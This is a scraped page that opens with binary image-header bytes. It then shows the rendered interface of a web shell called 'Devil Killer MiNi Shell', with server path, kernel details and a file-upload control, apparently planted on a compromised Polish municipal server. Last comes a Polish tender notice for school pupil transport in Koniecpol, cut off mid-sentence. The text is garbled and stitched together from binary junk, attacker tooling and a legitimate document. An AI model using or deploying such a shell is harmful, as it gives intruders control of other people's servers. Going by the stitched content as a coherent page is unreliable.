JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210812/0014774001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00147740 z dnia 2021-08-12</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów z Gminy Koniecpol do szkół w roku szkolnym 2021/2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Koniecpol</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151397990</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Chrząstowska 6A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koniecpol</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umig@koniecpol.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.koniecpol.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów z Gminy Koniecpol do szkół w roku szkolnym 2021/2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bc0ffdd0-fb72-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00147740</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001903/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz uczniów z Gminy Koniecpol do szkół w roku szkolnym 2021/2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.koniecpol.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w Instrukcji użytkowania systemu miniPortal oraz Regulaminie ePUAP. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji” wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że: <br/>1)	administratorem danych osobowych osób fizycznych jest Miasto i Gmina Koniecpol reprezentowana przez Burmistrza, z siedzibą: ul. Chrząstowska 6A, 42-230 Koniecpol, tel. (34) 355-18-81;<br/>2)	kontakt z Inspektorem Danych Osobowych – e-mail: iod@koniecpol.pl, telefon: (34) 360 – 82-65;<br/>3)	dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia 2016/679 w celu związanym z postępowaniem o udzielenie zamówienia publicznego: „Dowóz uczniów z Gminy Koniecpol do szkół w roku szkolnym 2021/2022”, nr sprawy ZP.271.23.2021;<br/>4)	odbiorcami danych osobowych osób fizycznych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp;<br/>5)	dane osobowe osób fizycznych będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez osobę fizyczną danych osobowych bezpośrednio jej dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 rozporządzenia 2016/679;<br/>8)	osoba fizyczna posiada:<br/>a)	na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych (UWAGA: korzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (UWAGA: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/ Pan, że przetwarzanie danych osobowych Pani/ Pana dotyczących narusza przepisy RODO;<br/>9)	osobie fizycznej nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.23.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie (część) nr 1 – Usługa transportowa polegająca na dowozie dzieci i młodzieży do placówek oświatowych zlokalizowanych na terenie gminy Koniecpol i odwozie do miejsca zamieszkania po zakończonych zajęciach szkolnych w okresie od dnia 01.09.2021 r. do dnia 24.06.2022 r., z wyłączeniem dni wolnych od nauki szkolnej. Zakres zamówienia w części nr 1 dotyczy następujących placówek oświatowych:<br/>1)	Szkoły Podstawowa nr 1 i Przedszkole nr 1 w Koniecpolu oraz odwóz do miejsca zamieszkania, obejmujący dzieci i młodzież szkolną z następujących miejscowości: Stanisławice – 3 uczniów; Okołowice – 4 uczniów; Łabędź – 4 uczniów; Łysiny – 2 uczniów (w tym 1 do Przedszkola); Radoszewnica - 38 uczniów (w tym 3 do Przedszkola); Luborcza - 13 uczniów (w tym 2 do Przedszkola); Stary Koniecpol – 47 uczniów (w tym 15 do Przedszkola); Zagacie – 5 uczniów (w tym 1 do Przedszkola); Wąsosz – 4 uczniów; Kuźnica Wąsowska – 3 uczniów (w tym 1 do Przedszkola); Łysaków – 4 uczniów (w tym 1 do Przedszkola); Teodorów – 5 uczniów; Aleksandrów - 6 uczniów (w tym 4 do Przedszkola); Michałów – 1 uczeń; Koniecpol, ul. Przedmieście Przysieka – 9 uczniów (w tym 4 do Przedszkola); Koniecpol, ul. Kościuszki – 3 uczniów; Koniecpol, ul. Armii Krajowej – 4 uczniów (w tym 3 do Przedszkola); Koniecpol, ul. Przedmieście Magdasz - 11 uczniów (w tym 2 do Przedszkola), Koniecpol, ul. Klonowa – 12 uczniów. Łączna liczba uczniów objętych dowozem - 178 uczniów.<br/>2)	Dowóz uczniów do Szkoły Podstawowej nr 2 w Koniecpolu oraz odwóz do miejsca zamieszkania obejmujący dzieci i młodzież szkolną z następujących miejscowości: Załęże – 4 uczniów; Kuźnica Grodziska – 5 uczniów; Oblasy – 1 uczeń; Wólka – 1 uczeń; Pękowiec – 1 uczeń; Okołowice – 1 uczeń; Radoszewnica – 1 uczeń; Teresów – 2 uczniów; Wąsosz – 1 uczeń; Koniecpol, ul. Armii Krajowej – 14 uczniów; Koniecpol, ul. Łąkowa – 2 uczniów; Koniecpol, ul. Wąska – 8 uczniów; Koniecpol, ul. Klonowa – 12 uczniów; Koniecpol, ul. Górna – 7 uczniów; Koniecpol, ul. Zielona - 1 uczeń; Koniecpol, ul. Kościuszki – 1 uczeń. Łączna ilość uczniów objętych dowozem – 62 uczniów.<br/>3)	Dowóz uczniów do Szkoły Podstawowej w Rudnikach i odwóz do miejsca zamieszkania obejmujący uczniów z następujących miejscowości: Kuźnica Grodziska - 23 uczniów; Oblasy – 14 uczniów; Pękowiec – 3 uczniów, Załęże - 2 uczniów. Łączna ilość uczniów objętych dowozem – 42 uczniów.<br/>4)	Dowóz uczniów do Szkoły Podstawowej w Łysinach i odwóz do miejsca zamieszkania obejmujący dzieci i młodzież szkolną z następujących miejscowości: Okołowice - 23 uczniów; Stanisławice - 2 uczniów; Łabędź - 2 uczniów; Radoszewnica – 2 uczniów, Koniecpol, ul. Mickiewicza – 1 uczeń. Łączna liczba uczniów objętych dowozem – 30 uczniów.<br/><br/>UWAGA: Szczegółowy wykaz zawierający liczbę uczniów wsiadających/ wysiadających na poszczególnych przystankach wraz z propozycją tras dowozu stanowi załącznik nr 3 do niniejszej SIWZ.<br/><br/>Wymagania stawiane wykonawcy dla Zadania (części) nr 1: <br/>1)	Dzieci i młodzież szkolna muszą być dowożone rano przed rozpoczęciem zajęć w poszczególnych placówkach, lecz nie wcześniej niż na 20 minut przed ich rozpoczęciem. <br/>2)	Odwozy dla dzieci młodszych winny być realizowane pomiędzy godz. 12.00 a godz. 13.00. Odwozy dzieci starszych (VII i VIII klasa Szkoły Podstawowej) w godz. 14.00 – 15.00. Wykonawca zobowiązany będzie do dostosowania godzin dowozu i odwozu do zajęć szkolnych w poszczególnych placówkach, w tym do przesunięcia godzin odwozu w związku z realizacją zajęć dodatkowych. <br/>3)	Wykonawca zapewni bezpłatny przewóz dla opiekunów dowozu. Wszystkie trasy zaczynają się i kończą przy wyszczególnionych placówkach oświatowych. <br/>4)	Realizacja przedmiotu zamówienia może odbywać się będzie w ramach świadczenia przewozów regularnych komunikacji zbiorowej, na podstawie biletów miesięcznych wystawianych dla każdego ucznia. Wykonawca zobowiązany będzie do przejazdu na wyznaczonych trasach w ilości trzech przejazdów (1 dowóz + 2 odwozy), zgodnie z rozkładem jazdy, w godzinach porannych oraz po zakończeniu zajęć w godzinach popołudniowych w poszczególnych placówkach oświatowych. Wartość usługi w poszczególnych miesiącach wyznaczona będzie jako iloczyn ceny biletu miesięcznego i ilości uczniów, dla których te bilety będą wystawione.<br/>5)	Wykonawca zobowiązany będzie do świadczenia usługi pojazdami odpowiednio oznakowanymi z aktualnymi badaniami technicznymi i utrzymanymi w należytej czystości i porządku zapewniającym bezpieczeństwo przewożonych uczniów. <br/>6)	Wykonawca zobowiązany będzie do zatrzymywania pojazdów wyłącznie w wyznaczonych przez Zamawiającego przystankach autobusowych określonych w załączniku nr 3 do SWZ. Obowiązek określony w zdaniu pierwszym dotyczy zarówno dowozu jak i odwozów do miejsca zamieszkania. Wykonawca nie może odmówić zatrzymania pojazdu na którymkolwiek z przystanków wyszczególnionych w załączniku nr 3. <br/>7)	W przypadku awarii pojazdu wykonawca zobowiązany będzie do podstawienia pojazdu zastępczego na własny koszt. Maksymalny czas podstawienia pojazdu zastępczego wynosi 35 minut.<br/>8)	Koszty dojazdu pojazdów z bazy Wykonawcy do miejsca rozpoczęcia świadczenia usługi oraz powrót do bazy po zakończeniu tras w danym dniu ponosi Wykonawca. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60112000-6 - Usługi w zakresie publicznego transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Serwis (czas podstawienia pojazdu zastępczego)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie (część) nr 2 – Przedmiotem zamówienia jest dowóz dzieci z terenu Gminy Koniecpol z miejsca ich zamieszkania do Specjalnego Ośrodka Szkolno – Wychowawczego w Bogumiłku w ilości 6 uczniów z msc. Koniecpol, w tym: dwóch uczniów z ul. Robotniczej, jednego ucznia z ul. Wąskiej, jednego z ul. Łąkowej, jednego z ul. Marii i Zuzanny Gruszeckich, jednego z ul. Ogrodowej oraz ich odwóz po zajęciach do miejsca zamieszkania w dni nauki szkolnej w roku szkolnym 2021/2022 w godzinach dostosowanych do zajęć szkolnych (7.50 – 16.00).<br/>Uwaga: <br/>Liczba dowożonych uczniów może ulec zmianie, tj. zwiększeniu lub zmniejszeniu, z tym że zwiększenie liczby dowożonych uczniów do Specjalnego Ośrodka Szkolno – Wychowawczego nie przekroczy liczby 7.<br/>Wymagania Zamawiającego dotyczące przedmiotu zamówienia w Zadaniu (części) nr 2: <br/>1)	Wykonawca zapewni bezpieczny i punktualny dowóz co najmniej 6 dzieci niepełnosprawnych z terenu gminy Koniecpol we wszystkie dni, w których odbywać są będą zajęcia dydaktyczne, opiekuńcze i wychowawcze w roku szkolnym 2021/2022 w Specjalnym Ośrodku Szkolno – Wychowawczym im. Jana Brzechwy w Bogumiłku, adres: Biała Wielka 208 A, 42-235 Lelów;<br/>2)	Wykonawca zapewni przejazd dzieci wraz z opiekunem, pojazdem gwarantującym minimum 8 miejsc dla pasażerów;<br/>3)	Wykonawca będzie świadczyć usługę dowozu i odwozu uczniów z zachowaniem zasady, że uczniowie dowożeni są do szkoły nie później niż na 10 minut przed rozpoczęciem zajęć i odebrani po zakończeniu zajęć bez zbędnej zwłoki;<br/>4)	Wykonawca zapewni przewóz uczniów środkiem transportu spełniającym normy do przewozu osób niepełnosprawnych, zapewniając dla każdej osoby i opiekuna miejsce siedzące, pojazd musi być wyposażony w pasy bezpieczeństwa i odpowiednio oznakowany;<br/>5)	W przypadku awarii wyznaczonego pojazdu Wykonawca zobowiązany jest do podstawienia pojazdu zastępczego w czasie nie dłuższym niż 35 minut. W przypadku zmiany pojazdu Wykonawca zapewni inny o parametrach nie gorszych od pojazdu podstawowego.<br/>6)	Pojazdy przeznaczone do wykonywania usługi (podstawowy/ zastępczy) muszą być utrzymane w należytym stanie technicznym, porządku oraz odpowiednio oznakowane, zapewniający bezpieczny przewóz dzieci niepełnosprawnych.<br/>7)	W przypadku braku możliwości zrealizowania przewozu Wykonawca pokryje dodatkowo koszty przewozu wynikłe z wykonania usługi przez podmiot zastępczy wybrany przez Zamawiającego;<br/>8)	Przewozy będą się odbywały w ramach przewozu zamkniętego, obejmującego tylko uczniów i opiekuna. Sposób realizacji przedmiotu zamówienia:<br/>a)	odbiór dzieci z domu pod wskazanymi adresami lub miejsca zbiorczego – godziny odbioru ustali Zamawiający z Wykonawcą;<br/>b)	dowóz do Specjalnego Ośrodka Szkolno – Wychowawczego im. Jana Brzechwy w Bogumiłku;<br/>c)	odbiór dzieci z Specjalnego Ośrodka Szkolno – Wychowawczego im. Jana Brzechwy w Bogumiłku – godziny odbioru ustali Wykonawca z Zamawiającym po otrzymaniu rozkładu zajęć z Specjalnego Ośrodka Szkolno – Wychowawczego im. Jana Brzechwy w Bogumiłku;<br/>d)	Odwóz do domu, pod wskazane adresy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Serwis (czas podstawienia pojazdu zastępczego)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią następujące warunki udziału w postępowaniu dotyczące: <br/>1)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Warunek dla Zadania (części) nr 1: Wykonawca zobowiązany jest posiadać zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie krajowego transportu osób.<br/>Warunek dla zadania (części) nr 2: Wykonawca zobowiązany jest do posiadania aktualnej licencji na wykonywanie krajowego transportu drogowego w zakresie przewozu osób – obowiązującej co najmniej do dnia 30.06.2022 r. lub zezwolenia na wykonywanie zawodu przewoźnika drogowego w zakresie krajowego transportu 